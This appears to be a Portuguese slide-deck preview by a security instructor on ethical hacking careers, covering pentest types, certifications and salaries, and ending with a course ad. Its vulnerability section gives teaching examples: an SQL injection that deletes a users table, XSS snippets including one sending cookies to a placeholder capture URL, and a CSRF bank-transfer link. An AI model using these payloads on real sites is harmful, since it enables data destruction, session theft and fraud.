Importância do profissional Hacker ético no mercado de trabalho

Preview:

Citation preview

A importância do profissional

Hacker Ético no mercado

Marcos Flávio Araújo Assunção

mflavio@defhack.com

Marcos Flávio Araújo Assunção

Formação:

Mestre em Sistemas de Informação pela Universidade Fumec

Especialista em Redes de Computadores pela ESAB

Especialista em Docência para o ensino profissional pelo Senac Minas

Graduado em Engenharia de Software pelo Centro Universitário UMA

Atuação:

Professor universitário no Centro Universitário UNA

Orientador de curso no Senac Minas

Consultor e palestrante em segurança de redes e ensino profissionalizante

Marcos Flávio Araújo Assunção

Certificações

CEH

CCNA

Cisco ITQ

Publicações:

Guia do Hacker Brasileiro

Desafio Linux Hacker

Segredos do Hacker Ético

(5 edições)

Honeypots e Honeynets

Wireless Hacking

Projetos:

Valhala Honeypot

Por que a área de IT

Security cresce tanto?

Principais problemas (Fonte: govtech.com)

Como o mercado vê o

Hacker ético

profissional?

Forbes – Hacker Ético é uma das

principais carreiras do futuro

Governo americano recruta hackers

globodigital

Cresce a busca pelo Hacker Ético

jornal-o-globo

MCT convida movimento Hacker

brasilgov

Precisa-se de Hackers experientes

estadominas-online

Quanto é o salário de

um Pentester (Ethical

Hacker) ?

Fonte: indeed.com

Pagamento médio CEH (Fonte: softwareadvice.com)

Linkedin: a fonte de oportunidades em Ethical Hacking

Freelancing em Ethical Hacking

O que faz um

profissional Hacker

Ético / Pentester ?

Penetration Test (Teste de Invasão)

Consiste em utilizartécnicas de Hackers emtestes de stress da segurança de redes e sistemas

É a principal ferramentade um Hacker Ético

CEH, LPT, Ethical Hacking Foundation, OCSP, GWAPT, GPEN, etc.

Padrões e entidades que exigem Penetration Tests

Teste de “stress” – Uma necessidade real

Teste de “stress” - Pressão

capacete

Teste de “stress” - Temperatura

flame-test-helmet

Fases de um PenTest

Tipos de Penetration Test

Black Box

White Box

Gray Box

Black Box

Teste realizado em um sistema remoto, sem nenhum conhecimento do alvo. O invasor deve partir da estaca zero, sem informações sobre endereços IPs públicos, sistemas operacionais utilizados, tipos de roteadores e firewalls, etc. Esse teste visa demonstrar a visão de um atacante de fora da intranet da empresa.

Gray Box

Teste realizado entre departamentos ou sub-redes de uma intranet, com conhecimento parcial da estrutura. O objetivo desse teste é demonstrar até que ponto um funcionário consegue chegar caso ele decida tentar acessar um sistema de outro departamento ao qual ele não tem acesso legítimo. Nesse tipo de PenTest, temos conhecimento parcial da rede, como a faixa de endereços IPs utilizada na sub-rede de origem, o endereço IP do gateway e do servidor DNS, etc.

White Box

Teste realizado em uma intranet local, com total conhecimento do alvo. Nesse teste, temos o conhecimento total de como a rede opera, sabemos todos os dispositivos, endereços e sistemas operacionais utilizados. A visão de um teste White Box é a de um administrador de rede. Essa metodologia de testagem é utilizada quando desejamos conhecer até onde um administrador poderá ir caso deseje acessar dados ou obter informações, tais como conversar de MSN, senhas de usuários, e-mails alheios, etc.

Níveis de um Pentester / Ethical Hacker

Nível 1 – Júnior – Tool based Penetration Tester:Esse profissional é aquele que somente conhece as ferramentas básicas parao pentest, não sendo capaz de desenvolver suas próprias técnicas e ferramentas.Muitas vezes aprenderam as técnicas em treinamentos específicos. Aqui estão as certificações CEH, ECSA, LPT, Ethical Hacking Foundation, GPen e GWapt

Nível 2 – Pleno – Coding based Penetration Tester:Esse profissional é aquele que desenvolve suas próprias ferramentas e scripts para a realização dos penetration tests, mas ainda está limitado ao teste de vulnerabilidades já conhecidas. Consegue entretanto melhorar soluções existentes, como criar novos módulos para o Metasploit. Necessita de conhecimentos pelo menos em algoritmos e linguagens básicas de programação. Temos nesse nível o OSCP.

Nível 3 – Sênior – Vulnerability Researcher:Ao invés de realizarem PenTests, muitos hackers éticos com conhecimento mais avançado preferem debugar o funcionamento de softwares e protocolos em busca de falhas do tipo 0-day, e muitos são contratados por empresas com essa finalidade. Ainda não existe uma certificação de peso neste nível.

Certificações de

Ethical Hacking

EXIN Ethical Hacking Foundation

EC-COUNCIL Certified Ethical Hacker (CEH)

EC-COUNCIL ECSA Pentest

ECCOUNCIL Licensed Penetration Tester

GIAC - GPEN

GIAC GWAPT

Offensive Security Certified Professional

Exemplos de

vulnerabilidades

testadas

Falhas de softwares

Buffer Overflows

(Stack e Heap)

Strings de format

vulneráveis

Memory corruption

Injection (SQL,

XPATH, CMD, XSS,

CSRF)

Permissões incorretas

SQL Injection

GET /user_lookup.cfm?lastname=assuncao ’;DELETE FROM users

WHERE 1=‘1 HTTP/1.1

SELECT *

FROM users

WHERE lastname = ‘assuncao’;DELETE FROM users WHERE 1=‘1’

Cross Site Scripting <XSS>

<script> alert(‘Oi’!) </script>

<script>

location.href=“http://www.site.com/captura.cfm?c=“

+ document.cookie</script>

<a href=“javas&#99;ript&#35;[código]>

<div style=“behaviour: url([código]);”>

<body onload=“[código]”>

<img src=“javascript:[código]”>

Cross Site Request Forgery (CSRF)

Exemplo: Maria está logada no site do banco e a URL da transação é:

http://banco.com/transf?conta=MARIA&quantia=100

Um ataque pode criar um link que altera o valor da transação:

<a href=http://banco.com/transf?conta=MARIA$quantia=100000>

Ou uma imagem “falsa”:

<img src=http://banco.com/transf?conta=MARIA$quantia=100000>

Quero atuar na área.

Como começar?

Treinamento em Fundamentos de Ethical Hacking

• 21 horas de vídeos

• 175 aulas

• Acesso ilimitado e eterno

• Certificado internacional

• Conteúdo aborda a maioria

das certificações de PenTest

• 50% de desconto: pague apenas 100

reais pelo curso.

Acesse para aproveitar a promoção:

www.marcosflavio.com.br

Dúvidas?

A importância do profissional

Hacker Ético no mercado

Marcos Flávio Araújo Assunção

mflavio@defhack.com